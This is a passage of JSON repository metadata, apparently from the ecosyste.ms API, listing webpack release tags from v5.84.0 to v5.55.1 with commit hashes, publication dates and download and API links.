l,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_u